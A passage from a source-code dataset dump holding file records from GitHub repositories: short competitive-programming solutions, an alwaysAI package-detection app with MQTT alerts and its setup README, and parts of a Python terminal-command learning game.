"for _ in range(int(input())):\n times = []\n for _ in range(10):\n times.append([int(i) for i in input().split()])\n count = 0\n for i in range(10):\n for j in times[i]:\n if j <= 30:\n count += 1\n if count >= 60:\n print(\"yes\")\n else:\n print(\"no\")\n \n" }, { "alpha_fraction": 0.379084974527359, "alphanum_fraction": 0.4313725531101227, "avg_line_length": 16, "blob_id": "e60e663ee2ef349ad8111efd0d9a8be109d68464", "content_id": "8691fcf09966a729ada9d33ce7ab5f948a478d34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 153, "license_type": "no_license", "max_line_length": 29, "num_lines": 9, "path": "/FLOW004.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s=int(n%10)\n t=0\n while (n>0):\n 
t=int(n%10)\n n=int(n/10)\n s=s+t\n print(s)\n" }, { "alpha_fraction": 0.4093567132949829, "alphanum_fraction": 0.429824560880661, "avg_line_length": 21.799999237060547, "blob_id": "7c157050e5a991d89df5721c9e740b243f249ace", "content_id": "f7d488d142601f0ff69d84a1436489b0c082e6cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 342, "license_type": "no_license", "max_line_length": 41, "num_lines": 15, "path": "/POTATOES.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "def isprime(n):\n if n==1:\n return False\n else:\n for i in range(2,(n//2)+1):\n if n%i == 0:\n return False\n else:\n return True\nfor _ in range(int(input())):\n x,y=[int(i) for i in input().split()]\n s= x+y+1 \n while (isprime(s)==False):\n s+=1 \n print(s-(x+y))\n" } ]
141
abhatikar/package-monitor
https://github.com/abhatikar/package-monitor
ad87f0bd7b4e0742563391e7a9498a64c7087b7e
e04648548bab7e501620e400e62e0ae064a003da
26eb93e0b2b3f401915f40f867d688406fdd4950
refs/heads/main
2023-03-29T21:19:14.045147
2021-04-05T15:06:55
2021-04-05T15:06:55
325,638,626
1
1
Apache-2.0
2020-12-30T20:07:59
2021-04-02T13:33:38
2021-04-05T15:06:55
Python
[ { "alpha_fraction": 0.5791966915130615, "alphanum_fraction": 0.5808444619178772, "avg_line_length": 36.9296875, "blob_id": "08e45e3b492a345bd2264cb999bf1e3d492d84cb", "content_id": "d1309b12ca9fbe335516505bd3be1c175acd3df5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4855, "license_type": "permissive", "max_line_length": 108, "num_lines": 128, "path": "/package_detection/package_monitor.py", "repo_name": "abhatikar/package-monitor", "src_encoding": "UTF-8", "text": "from copy import deepcopy\nimport time\nimport paho.mqtt.client as mqtt\n\nclass PackageMonitor:\n def __init__(self):\n \"\"\"This class enables a state machine system for package detection.\n \"\"\"\n self.previous_packages = {}\n self.current_packages = {}\n self.packages_added = []\n self.packages_removed = []\n self.pending = False\n self.timer = time.time()\n self.rois = {}\n self.mqtt_client = mqtt.Client(\"Package_Monitor\")\n self.mqtt_client.connect(\"broker.hivemq.com\")\n self.mqtt_client.loop_start()\n\n def set_packages(self, objects):\n \"\"\"Sets previous packages to the current packages and\n sets the current packages to the input objects.\n\n Args:\n objects (dictionary): the object ID is the key \n and the ObjectDetectionPrediction as the value.\n \"\"\"\n self.previous_packages = deepcopy(self.current_packages)\n \n self.current_packages = deepcopy(objects)\n self.check_for_updates()\n\n def get_count(self):\n \"\"\"Returns the number of current packages.\n\n Returns:\n int: Number of items in the current_packages dictionary.\n \"\"\"\n return len(self.current_packages)\n\n def get_current_packages(self):\n \"\"\"Returns current package dictionary.\n\n Returns:\n dictionary: the object ID is the key \n and the ObjectDetectionPrediction as the value.\n \"\"\"\n return self.current_packages\n\n def action(self):\n \"\"\"Checks the state of the system. 
Replace returned\n string with desired action items for customized system.\n\n Returns:\n string: A string description of the state.\n \"\"\"\n action = \"{}: \".format(time.asctime())\n if self.pending:\n if time.time() - self.timer >= 5:\n # check for old ROIs \n if not self.check_overlap():\n # if packages have been removed, send alert\n action += \"Send Alert: packages removed.\\n\"\n print(action) #printing this for demo purposes\n self.mqtt_client.publish(\"alwaysai/package-alert\", \"Alert: packages removed\")\n else:\n action += \"False alarm, packages are there.\\n\"\n print(action) #printing this for demo purposes\n self.mqtt_client.publish(\"alwaysai/package-alert\", \"False alarm: packages are there\")\n self.pending = False \n self.rois = deepcopy(self.current_packages)\n else:\n return action \n\n if len(self.packages_removed) > 0:\n self.pending = True\n self.rois = deepcopy(self.previous_packages)\n self.timer = time.time()\n action += \"Packages may have been removed\\n\"\n print(action) #printing this for demo purposes\n self.mqtt_client.publish(\"alwaysai/package-alert\", \"Packages may have been removed\")\n\n if len(self.packages_added) > 0:\n action += \"More packages have arrived!\\n\"\n print(action) #printing this for demo purposes\n self.mqtt_client.publish(\"alwaysai/package-alert\", \"More packages have arrived!\")\n\n if len(self.packages_removed) == 0 and len(self.packages_added) == 0:\n action += \"Nothing new here, waiting for packages. Package count is {}\".format(self.get_count())\n\n return action\n\n def check_overlap(self):\n \"\"\"Checks if new predictions match the last non-empty\n bounding boxes sufficiently. 
Helps avoid false alerts.\n\n Returns:\n boolean: True if all previous boxes have sufficient current overlap.\n \"\"\"\n rois = [prediction.box for prediction in self.rois.values()]\n predictions = [prediction.box for prediction in self.current_packages.values()]\n print(\"roi length {}\".format(len(rois)))\n print(\"predictions length {}\".format(len(predictions)))\n for roi in rois:\n match = False\n for pred in predictions:\n if pred.compute_overlap(roi) > 0.9:\n match = True\n if not match:\n return False\n\n return True\n\n def check_for_updates(self):\n \"\"\"Updates state for new and missing packages.\n \"\"\"\n self.packages_added = list(self.current_packages.keys() \n - self.previous_packages.keys())\n self.packages_removed = list(self.previous_packages.keys() \n - self.current_packages.keys())\n \n def package_is_detected(self):\n \"\"\"Gives current count of packages\n\n Returns:\n int: number of packages detected\n \"\"\"\n return len(self.current_packages) > 0\n" }, { "alpha_fraction": 0.5207203030586243, "alphanum_fraction": 0.5261445045471191, "avg_line_length": 37.09090805053711, "blob_id": "1c8d2200c8c321a3d4dfcbc199dcec7e1636df8c", "content_id": "81a99d3ad75d360f2a32b7b65136c362f0dcfa47", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4609, "license_type": "permissive", "max_line_length": 95, "num_lines": 121, "path": "/package_detection/app.py", "repo_name": "abhatikar/package-monitor", "src_encoding": "UTF-8", "text": "import time\nimport edgeiq\nimport numpy\nfrom package_monitor import PackageMonitor\nimport os\n\"\"\"\nMonitor an area for packages and people and respond when packages have\nbeen removed from the area.\n\"\"\"\n\ndef main():\n\n cam_type = os.environ.get('OPENNCC_CAM')\n print(cam_type)\n model_name = None\n if cam_type is None:\n model_name = \"abhatikar/package_detector\"\n package_detector = edgeiq.ObjectDetection(model_name)\n cam_type = 
os.environ.get('NCS2_CAM')\n if cam_type is None:\n cam_type = \"webcam\"\n package_detector.load(engine=edgeiq.Engine.DNN)\n else:\n cam_type = \"ncs2\"\n package_detector.load(engine=edgeiq.Engine.DNN_OPENVINO)\n else:\n cam_type = \"openncc\"\n model_name = \"abhatikar/package_detector_ncc\"\n\n # add a centroid tracker to see if a new package arrives\n centroid_tracker = edgeiq.CentroidTracker(\n deregister_frames=10, max_distance=50)\n if cam_type is not \"openncc\":\n # Descriptions printed to console\n print(\"Engine: {}\".format(package_detector.engine))\n print(\"Accelerator: {}\\n\".format(package_detector.accelerator))\n print(\"Model:\\n{}\\n\".format(package_detector.model_id))\n print(\"Labels:\\n{}\\n\".format(package_detector.labels))\n\n fps = edgeiq.FPS()\n\n # Variables to limit inference\n counter = 0\n DETECT_RATE = 10\n\n # Object to monitor the system\n pm = PackageMonitor()\n\n if cam_type is \"openncc\":\n video_stream = edgeiq.EyeCloud(model_name).start()\n else:\n video_stream = edgeiq.WebcamVideoStream(cam=0).start()\n try:\n with edgeiq.Streamer() as streamer:\n\n # Allow the camera to warm up\n time.sleep(2.0)\n fps.start()\n\n # Loop detection\n while True:\n counter += 1\n\n # Run this loop whenever there's a package detected or every DETECT_RATE frames\n if pm.package_is_detected() or counter % DETECT_RATE == 0:\n\n # Read in the video stream\n if cam_type is \"openncc\":\n frame = video_stream.get_frame()\n # Check for packages in the new frame\n package_results = video_stream.get_model_result(confidence_level=.90)\n else:\n frame = video_stream.read()\n # Check for packages in the new frame\n package_results = package_detector.detect_objects(\n frame, confidence_level=.90)\n\n if package_results is not None:\n # update the package predictions\n objects = centroid_tracker.update(package_results.predictions)\n pm.set_packages(objects)\n\n # Generate labels to display the face detections on the streamer\n text = [\"Model: 
{}\".format(model_name)]\n text.append(\n \"Inference time: {:1.3f} s\".format(package_results.duration))\n predictions = []\n\n # update labels for each identified package to print to the screen\n for (object_id, prediction) in objects.items():\n new_label = 'Package {}'.format(object_id)\n prediction.label = new_label\n text.append(new_label)\n predictions.append(prediction)\n\n # Alter the original frame mark up to show tracking labels\n frame = edgeiq.markup_image(\n frame, predictions,\n show_labels=True, show_confidences=False,\n line_thickness=3, font_size=1, font_thickness=3)\n\n # Do some action based on state\n text.append(pm.action())\n\n # Send the image frame and the predictions to the output stream\n streamer.send_data(frame, text)\n\n fps.update()\n\n if streamer.check_exit():\n video_stream.stop()\n break\n\n finally:\n fps.stop()\n print(\"elapsed time: {:.2f}\".format(fps.get_elapsed_seconds()))\n print(\"approx. FPS: {:.2f}\".format(fps.compute_fps()))\n print(\"Program Ending\")\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.7037312388420105, "alphanum_fraction": 0.7477329969406128, "avg_line_length": 46.37323760986328, "blob_id": "95e9c06361f2fa8825cfaf7a4cf9a921445c9f38", "content_id": "7bfaca933f199e6b31786d623e495853c166fea8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 13454, "license_type": "permissive", "max_line_length": 850, "num_lines": 284, "path": "/package_detection/README.md", "repo_name": "abhatikar/package-monitor", "src_encoding": "UTF-8", "text": "# Package Monitor and Detection App\nThis app is designed to let you use your own custom package detection model to detect when packages arrive and when they are removed You'll need an alwaysAI account and to have alwayAI installed:\n\n- [alwaysAI account](https://alwaysai.co/auth?register=true)\n- [alwaysAI CLI 
tools](https://dashboard.alwaysai.co/docs/getting_started/development_computer_setup.html)\n\n## Requirements\nThis app is intended to work on a model you've trained yourself! Follow the steps below before running your app. The alwaysAI support team is available on Discord to help you if you get stuck: https://discord.gg/rjDdRPT.\n\n### Collect a Dataset\nTo get you up and running, we've prepared a [dataset](https://www.alwaysai.co/docs/_static/beta/Packages.zip) that includes a few hundred images of packages being placed and removed from an outdoor doorstep. This app will work best using a model that has been trained on your own doorstep (or wherever you intend to run your app), so we encourage you to add to this dataset. See [this doc](https://alwaysai.co/docs/model_training/data_collection.html#data-capture-guidelines) for data collection tips). For speedy data collection, you can use this [image capture app](https://github.com/alwaysai/expanded-image-capture-dashboard) available on the alwaysAI GitHub. Also checkout the [hacky hour](https://www.youtube.com/watch?v=jNpxVea8F9Q&feature=youtu.be) on the package dataset collection for tips on how to set up your own data collection process.\n\n### Annotate your Data\nThen you can annotate your data, using [this guide](https://alwaysai.co/docs/model_training/data_annotation.html).\n\n### Dataset\n\nThe images catpured and annotated look like these. These are the pictures of the package at the doorstep at varied angles and lighting conditions.\n\n<img src=\"https://github.com/abhatikar/package-monitor/raw/main/assets/data1.png\" width=\"600\" height=\"600\">\n\n<img src=\"https://github.com/abhatikar/package-monitor/raw/main/assets/data2.png\" width=\"600\" height=\"600\">\n\n\n### Train your Model\n Then, follow the [training section](https://alwaysai.co/docs/model_training/quickstart.html#step-3-train-your-model) of our quickstart guide to train your own model. 
You'll find links to tips for data collection and annotation on that page as well. To see how to use your model in an application, refer to the [Model Publish](#model-publish) section.\n\n### Set up your Project\nClone this repo into a local directory. Then cd into new folder and run `aai app configure` and make the following selections:\n- When prompted to choose a project, use the down arrow and select `Create new project`, choosing any name you like.\n- Choose to run either locally or on an edge device.\n\nThe `app.py` and `alwaysai.app.json` files should be automatically detected and you should not need to create them.\n\nYou can find details on working with projects [here](https://alwaysai.co/docs/getting_started/working_with_projects.html).\n\n\n## Model Conversion\n\n![alt text](https://github.com/abhatikar/package-monitor/raw/main/assets/convert.png \"Model Conversion\")\n\nIf you want to run this app using an OpenNCC camera, you will have to convert the model you have trained into the format that makes it optimized to run on the OpenNCC camera. The conversion uses the OpenVino toolkit to achieve this. That way you could use the camera with a embedded microcomputer like raspberry pi without compromising the speed of the model inferences. To convert your model to the EyeCloud optimized format, run:\n\n```bash\naai model convert <input-model-id> --format eyecloud --output_id <output-model-id>\n```\n\nHere the `input model id` is the full id, including your usename; this is what is output at the end of a training session and has a format of `<username/model-name>`. 
The `output model id` is just the name you want to give the converted model, do not include your username in this.\ne.g if `abhatikar/package_detector` is the model name that is trained locally, and the output model id is `package_detector_eyecloud`, so the command to convert the model to eyecloud camera format would be:\n\n```bash\naai model convert abhatikar/package_detector --format eyecloud --output_id package_detector_eyecloud\n```\n\nYou can then publish the converted model into the alwaysai platform to use them in your projects.\n\n## Publish Your Model\nYou can either publish your model and add it to your project using aai app models add, or test out an unpublished version using the --local-version flag with this command. See [this documentation](https://alwaysai.co/docs/model_training/using_your_model.html) for full details.\n\nRefer to the AlwaysAI docs to know how you can achieve this using the CLI.\n\n## Running\nYou can run the application in 6 different ways.\n\n#### <b>Use a laptop with the USB webcam</b>\n\nConnect your Web camera to your laptop's USB port. Replace the models in `app.py` with the name of your own model or leave it as default!\nNext, you copy the Dockerfile template for alwaysai.\n\nRun the project as you would any alwaysAI app! See [our docs pages](https://alwaysai.co/blog/building-and-deploying-apps-on-alwaysai) if you need help running your program.\n\n```bash\ncp Dockerfile.alwaysai Dockerfile\ncp alwaysai.app.json.usbcam alwaysai.app.json\naai app configure\naai app install\naai app start\n```\nThis will run the app without any acceleration and you will see the inference time is higher\n\n#### <b>Use a laptop with the USB webcam and NCS2 stick</b>\n\nConnect your webcam camera to your laptop's USB port.Connect the NCS2 stick to the laptop's USB 3.0 port. Replace the models in `app.py` with the name of your own model or leave it as default! 
\nNext, you copy the Dockerfile template for alwaysai.\n\nRun the project as you would any alwaysAI app! See [our docs pages](https://alwaysai.co/blog/building-and-deploying-apps-on-alwaysai) if you need help running your program.\n\n```bash\nexport NCS2_CAM=1\ncp Dockerfile.alwaysai Dockerfile\ncp alwaysai.app.json.usbcam alwaysai.app.json\naai app configure\naai app install\naai app start\n```\n\n#### <b>Use a laptop with the OpenNCC camera</b>\n\nConnect your OpenNCC camera to your laptop's USB 3.0 port. Replace the models in `app.py` with the name of your own model which you converted \nor leave it as default! \nNext, you copy the Dockerfile template for alwaysai.\n\nRun the project as you would any alwaysAI app! See [our docs pages](https://alwaysai.co/blog/building-and-deploying-apps-on-alwaysai) if you need help running your program.\n\n```bash\nexport OpenNCC=1\ncp Dockerfile.alwaysai Dockerfile\ncp alwaysai.app.json.eyecloud alwaysai.app.json\naai app configure\naai app install\naai app start\n```\n\n#### <b>Use a Raspberry Pi4 with the USB webcam</b>\n<p>\n\nConnect your webcam to the Raspberry Pi4 USB 3.0 port. Replace the models in `app.py` with the name of your own model or leave it as default! 
\nFollow the [guide](https://www.balena.io/docs/learn/getting-started/raspberrypi4-64/python/) to setup the Raspberry Pi4 to work with Balena platform.\nNext, you copy the Dockerfile template for Balena and run the balena cli commands as shown below from the top level directory\n\n```bash\ncp Dockerfile.balena Dockerfile\ncp alwaysai.app.json.usbcam alwaysai.app.json\ncd <directory which has docker-compose.yml>\nbalena push <app name>\n```\n\n#### <b>Use a Raspberry Pi4 with the USB webcam and NCS2 stick</b>\n<p>\n\n<u><b>*Architecture*</b></u>\n\n![alt text](https://github.com/abhatikar/package-monitor/raw/main/assets/arch2.png \"Architecture\")\n\n\n<u><b>*Setup*</b></u>\n\n<img src=\"https://github.com/abhatikar/package-monitor/raw/main/assets/setup2.jpg\" width=\"600\" height=\"600\">\n\nConnect your webcam and the NCS2 stick to the Raspberry Pi4 USB 3.0 port. Replace the model in `app.py` with the name of your own model or leave it as default! \nFollow the [guide](https://www.balena.io/docs/learn/getting-started/raspberrypi4-64/python/) to setup the Raspberry Pi4 to work with Balena platform.\nNext, you copy the Dockerfile template for Balena and run the balena cli commands as shown below from the top level directory\nUncomment the line to enable the NCS2 with USB webcam in the `docker-compose.yaml`\n\n`#- NCS2_CAM=1 #Enable this if you have NCS stick plugged in`\n\n```bash\ncp Dockerfile.balena Dockerfile\ncp alwaysai.app.json.usbcam alwaysai.app.json\ncd <directory which has docker-compose.yml>\nbalena push <app name>\n```\n#### Example Output\n\n```bash\n\n[Logs] [1/12/2021, 11:16:32 PM] [package-monitor] Engine: Engine.DNN_OPENVINO\n[Logs] [1/12/2021, 11:16:32 PM] [package-monitor] Accelerator: Accelerator.MYRIAD\n[Logs] [1/12/2021, 11:16:32 PM] [package-monitor]\n[Logs] [1/12/2021, 11:16:32 PM] [package-monitor] Model:\n[Logs] [1/12/2021, 11:16:32 PM] [package-monitor] abhatikar/package_detector\n[Logs] [1/12/2021, 11:16:32 PM] [package-monitor]\n[Logs] 
[1/12/2021, 11:16:32 PM] [package-monitor] Labels:\n[Logs] [1/12/2021, 11:16:32 PM] [package-monitor] ['???', 'package']\n[Logs] [1/12/2021, 11:16:32 PM] [package-monitor]\n[Logs] [1/12/2021, 11:16:32 PM] [package-monitor] [INFO] Streamer started at http://localhost:5000\n\n```\n\n\n#### <b>Use a Raspberry Pi4 with the OpenNCC camera</b>\n<p>\n\n<u><b>*Architecture*</b></u>\n\n![alt text](https://github.com/abhatikar/package-monitor/raw/main/assets/arch.png \"Architecture\")\n\n\n<u><b>*Setup*</b></u>\n\n<img src=\"https://github.com/abhatikar/package-monitor/raw/main/assets/setup.jpg\" width=\"600\" height=\"600\">\n\nConnect your OpenNCC camera to the Raspberry Pi4 USB 3.0 port. Replace the models in `app.py` with the name of your own model which you converted! \nFollow the [guide](https://www.balena.io/docs/learn/getting-started/raspberrypi4-64/python/) to setup the Raspberry Pi4 to work with Balena platform.\nNext, you copy the Dockerfile template for Balena and run the balena cli commands as shown below from the top level directory\nUncomment the line to enable the NCS2 with USB webcam in the `docker-compose.yaml`\n\n`# - OPENNCC_CAM=1 #Enable this if you have an EyeCloud camera`\n\n```bash\ncp Dockerfile.balena Dockerfile\ncp alwaysai.app.json.eyecloud alwaysai.app.json\ncd <directory which has docker-compose.yml>\nbalena push <app name>\n```\n\nHere is the [link](https://www.youtube.com/watch?v=fk3arnsZ45Q) to the demo video.\n\nNote: If you use the OpenNCC IPC camera, it has Raspberry Pi 4 built-in which makes it an edge device in itself and you would not require a external micro computer.\n\n#### Mobile App\n\nTo get the notification on your mobile phone, download this [app](https://play.google.com/store/apps/details?id=com.app.vetru.mqttdashboard&hl=en_IE&gl=US) on your Android Phone.\n\nConfigure the broker to point to the MQTT broker of your choice. 
I am using a public broker which should be only used for <b>testing purposes</b> only.\n\nCreate a Text widget to subscribe to the topic matching in the file package_monitor.py. In our code we are using the MQTT topic <b><i>alwaysai/package-alert</b></i>. I strongly recommend to use a private broker and unique MQTT topic if you are using a public broker for testing.\n\n#### Example Output\n\n```bash\n/open_ncc_lib/moviUsbBoot /open_ncc_lib/flicRefApp.mvcmd\nPerforming bulk write of 8168336 bytes from /open_ncc_lib/flicRefApp.mvcmd...\nSuccessfully sent 8168336 bytes of data in 322.738822 ms (24.136954 MB/s)\ndevice opened\n03E7:F63B (usbver:32, bus 2, device 2)get our self usb device ver:32\n path: 6\noutEndPoint:[1]\ninEndPoint:[81]\noutEndPoint:[2]\ninEndPoint:[82]\noutEndPoint:[3]\ninEndPoint:[83]\n\n1D6B:0003 (usbver:30, bus 2, device 1)\n1532:0224 (usbver:20, bus 1, device 4) path: 8\n\n0BDA:579F (usbver:20, bus 1, device 3) path: 7\ninEndPoint:[81]\n\n0CF3:E300 (usbver:20, bus 1, device 2) path: 4\ninEndPoint:[82]\noutEndPoint:[2]\n\n1D6B:0002 (usbver:20, bus 1, device 1)\n22:18:43 : sdk/sdk.cpp(534) enter watchdog task.....\ncamera_video_out YUV420p 2\n22:18:43 : sdk/sdk.cpp(1230) meanValue: 0.00 0.00 0.00\n22:18:43 : sdk/sdk.cpp(889) initstatus ret:0 \n--------------------------------------------\nCamera detection succeeded!(sc8238)\n\n\n22:18:43 : sdk/sdk.cpp(900) CAM_AI_MODE\n22:18:43 : sdk/sdk.cpp(507) Reading Blob file: /app/models/abhatikar/package_detector_ncc/package_detector_ncc.blob (sz 13937728)\n\n22:18:43 : sdk/sdk.cpp(524) Blob size 13937728 has been sent return 0 meta size=1408\n\n22:18:43 : sdk/sdk.cpp(970) send blob ret =0 \n********Setup Caminfo size =68**********\nsize :1920 X 1080 \nai area:(0,0,1920,1080)\nai input: 300 X 300 \nmeanValue:0.00-0.00-0.00 stdValue:0\nEnable Output: YUV=1 H26x=0 MJpeg=0 Encoder type:0\n********Setup Caminfo**********\nsend CameraInfo ret=0 \n22:18:43 : sdk/sdk.cpp(991) create queue yuv:0xd48c55c0 
26x:0xd4c0a3e0 jpg:0xd4924d70 cnn:0xd4924e00 \ninitstatus \n--------------------------------------------\nCamera detection succeeded!(sc8238)\nDevice initialized OK!\n--------------------------------------------\n \ncreate thread ep 0 success!\ncreate thread ep 1 success!\n22:18:43 : sdk/sdk.cpp(258) enter scReadThread ep 0 ******\n\ncreate thread ep 2 success!\n22:18:43 : sdk/sdk.cpp(258) enter scReadThread ep 1 ******\n\n22:18:43 : sdk/sdk.cpp(258) enter scReadThread ep 2 ******\n\n[INFO] Streamer started at http://localhost:5000\n22:18:43 : sdk/sdk.cpp(338) EP:0 Meta type:2,seqNo:10, len:3110400 usb_size=3110464\n\n22:18:43 : sdk/sdk.cpp(338) EP:1 Meta type:24,seqNo:10, len:1472 usb_size=1536\n\n```\n\n## Troubleshooting\nDocs: https://dashboard.alwaysai.co/docs/getting_started/introduction.html\n\nCommunity Discord: https://discord.gg/rjDdRPT\n" } ]
3
bogobogo/bash-game
https://github.com/bogobogo/bash-game
91607ee9a7a3bd315c3e45aeb56b380e09c3a429
0eb278ed2fe657285bb5c8fc54b3c5478947c8d3
af8188252078e04c9ddf824bf21998f6cee48d43
refs/heads/master
2020-03-19T00:24:59.310244
2018-06-06T22:18:23
2018-06-06T22:18:23
135,479,177
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.500189483165741, "alphanum_fraction": 0.5365668535232544, "avg_line_length": 34.186668395996094, "blob_id": "29c3cb2ba993aa420323d55912629cd07fdeb744", "content_id": "be0cff716722a8b0a283510404f2003a4118e021", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2639, "license_type": "no_license", "max_line_length": 364, "num_lines": 75, "path": "/tests/main_test.py", "repo_name": "bogobogo/bash-game", "src_encoding": "UTF-8", "text": "import unittest\nimport sys\nimport os\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfrom src.main import addOutput, fill_line, addUserInput, prompt, InvalidArgument \n\n\nclass Tests(unittest.TestCase):\n ls_output = 'ideas.py\\nmain.py\\ntest.py\\nutils.py\\n'\n ps_putput = ' PID TTY TIME CMD\\n 1366 ttys000 0:00.21 /bin/zsh -l\\n 1743 ttys000 0:00.03 python\\n 534 ttys001 0:00.02 python\\n81324 ttys001 0:00.03 /Applications/iTerm.app/Contents/MacOS/iTerm2 --server login -fp eladbo\\n81326 ttys001 0:00.54 -zsh\\n 1756 ttys002 0:00.44 -zsh\\n 4082 ttys002 0:00.03 /usr/bin/python ./main.py\\n'\n def test_fill_line(self):\n l = 'asdf'\n c = '.'\n in_width = 80\n expected = 'asdf' + ('.' * (in_width-len(l)))\n result = fill_line(l, c, in_width=in_width)\n self.assertEqual(expected, result)\n\n def test_fill_line_invalid_char(self):\n l = 'asdf'\n c = '..'\n in_width = 80\n expected = 'asdf' + ('.' 
* (in_width-len(l)))\n self.assertRaises(\n InvalidArgument,\n lambda: fill_line(l, c, in_width=in_width)\n )\n\n def test_addOutput_1_line(self):\n output = 'ideas.py\\n'\n totalout_lines = []\n result = [\n fill_line('ideas.py','.'),\n ]\n addOutput(output, totalout_lines)\n self.assertEqual(totalout_lines, result)\n\n def test_addOutput_ls(self):\n totalout_lines = []\n result = [\n fill_line('ideas.py','.'),\n fill_line('main.py','.'),\n fill_line('test.py','.'),\n fill_line('utils.py','.'),\n ]\n addOutput(self.ls_output, totalout_lines, in_width=80)\n self.assertEqual(totalout_lines, result)\n\n def test_addOutput_over_IN_WIDTH(self):\n totalout_lines = []\n result = [\n fill_line('ideas.py','.'),\n fill_line('main.py','.'),\n fill_line('test.py','.'),\n fill_line('utils.py','.'),\n ]\n addOutput(self.ls_output, totalout_lines)\n self.assertEqual(totalout_lines, result)\n def test_add_user_input_fill(self):\n cmd = \"top -a\"\n totalout_lines = [\n prompt + \"ls\",\n fill_line('main.py',c = '.'),\n prompt\n ]\n addUserInput(cmd, totalout_lines)\n expected = [\n prompt + \"ls\",\n fill_line('main.py',c = '.'),\n fill_line(prompt + cmd, c = '.', compensation=10)\n ]\n self.assertEqual(totalout_lines, expected)\n \nif __name__ == '__main__':\n unittest.main()\n" }, { "alpha_fraction": 0.5308641791343689, "alphanum_fraction": 0.5432098507881165, "avg_line_length": 19.5, "blob_id": "3f57f4f4cb96d4596d83e74fccb150dad8e38b5c", "content_id": "2bb87612c070428b218107c8acc02e5f8c86d2ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 81, "license_type": "no_license", "max_line_length": 24, "num_lines": 4, "path": "/src/utils.py", "repo_name": "bogobogo/bash-game", "src_encoding": "UTF-8", "text": "def removeNewLine(s):\n if s.endswith(\"\\n\"):\n return s[:-1]\n return s" }, { "alpha_fraction": 0.5871211886405945, "alphanum_fraction": 0.6553030014038086, "avg_line_length": 21, "blob_id": 
"26e909aaa809fb57330a490de699b5c8958b8e14", "content_id": "0ee070c17f71779f3ce0d695464ed8b2a7363170", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 264, "license_type": "no_license", "max_line_length": 76, "num_lines": 12, "path": "/src/game.py", "repo_name": "bogobogo/bash-game", "src_encoding": "UTF-8", "text": "\nlevels = {\"1\" : 100, \n \"2\": 400, \n \"3\": 1000}\n\ndef createMission(desiredOutput, desiredInput, messages, xp, errorMessages):\n pass\n\nmission1 = createMission()\nmission2 = createMission()\nmissions = [mission1, mission2, mission3]\n\ngame(missions)" }, { "alpha_fraction": 0.5992907881736755, "alphanum_fraction": 0.616233229637146, "avg_line_length": 31.139240264892578, "blob_id": "ee4a2c7d7948a735bd8714f55d40a4106ef0e852", "content_id": "b8206108a544ffde84e15ec9f7ef2919bec86855", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2538, "license_type": "no_license", "max_line_length": 87, "num_lines": 79, "path": "/src/main.py", "repo_name": "bogobogo/bash-game", "src_encoding": "UTF-8", "text": "#!/usr/bin/python \n# -*- coding: utf-8 -*-\nimport sys\nimport subprocess\nimport os\nimport fileinput\nimport time\nimport renderer\nfrom consts import IN_WIDTH, TESTING\nfrom utils import removeNewLine\nfrom messages import level1_firstMessage, progressBar, totalxp\nfrom strings import first_message\n\ngetUserInput = lambda: sys.stdin.readline()\nclass InvalidArgument(Exception):\n pass\n \nprompt = '\\033[95m' + \"level 1 Hi game >\" + '\\033[94m'\n\ndef addPrompt(totalout_lines, prompt): \n totalout_lines.append('\\033[95m' + \"level 1 Hi game >\" + '\\033[94m')\n\ndef addUserInput(cmd, totalout_lines):\n totalout_lines[-1] = fill_line(totalout_lines[-1] + cmd , c=\" \", compensation = 10)\n\ndef fill_line(l, c=' ', in_width=IN_WIDTH, compensation = 0):\n if len(c) != 1:\n raise InvalidArgument\n return l + c * ((in_width-len(l)) + 
compensation)\n\ndef addOutput(output, totalout_lines, in_width=IN_WIDTH):\n lines = output.split(\"\\n\")\n filled_lines = []\n for l in lines:\n if len(l) < in_width and l != '':\n filled_lines.append(fill_line(l, c = \" \"))\n totalout_lines += filled_lines\n\n\ndef turn(totalout_lines, n=0):\n addPrompt(totalout_lines, prompt)\n renderer.write(prompt)\n userInput = getUserInput()\n command = removeNewLine(userInput)\n addUserInput(command, totalout_lines)\n try:\n process = subprocess.Popen(command, shell=True,\n stdout=subprocess.PIPE, \n stderr=subprocess.PIPE)\n out, err = process.communicate()\n subprocess.call(\"tput civis\", shell=True)\n totalxp.clean(totalout_lines) \n progressBar.clean(totalout_lines)\n level1_firstMessage.clean(totalout_lines)\n if out:\n addOutput(out, totalout_lines)\n renderer.write(out)\n elif err:\n addOutput(err, totalout_lines)\n renderer.write(err)\n totalxp.overlay(totalout_lines) \n progressBar.overlay(totalout_lines)\n level1_firstMessage.overlay(totalout_lines) \n subprocess.call(\"tput cnorm\", shell=True) \n turn(totalout_lines, n=n+1)\n except Exception as e:\n print 'Exception: %s' % e \n\nif __name__ == '__main__':\n renderer.cleanScreen()\n # subprocess.call(\"tput cup 0 1\", shell=True)\n renderer.setTerminalSize(150, 150)\n totalxp.overlay([]) \n progressBar.overlay([])\n level1_firstMessage.overlay([])\n turn([])\n\n## if command == 'cd ..':\n # os.chdir('..')" }, { "alpha_fraction": 0.599591851234436, "alphanum_fraction": 0.6236734986305237, "avg_line_length": 53.46666717529297, "blob_id": "c89a6824254129d618f6418ca090df1d18a08e5e", "content_id": "614934b70c3aea949b91f4ce09867b06fc5128a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2450, "license_type": "no_license", "max_line_length": 146, "num_lines": 45, "path": "/tests/renderer_test.py", "repo_name": "bogobogo/bash-game", "src_encoding": "UTF-8", 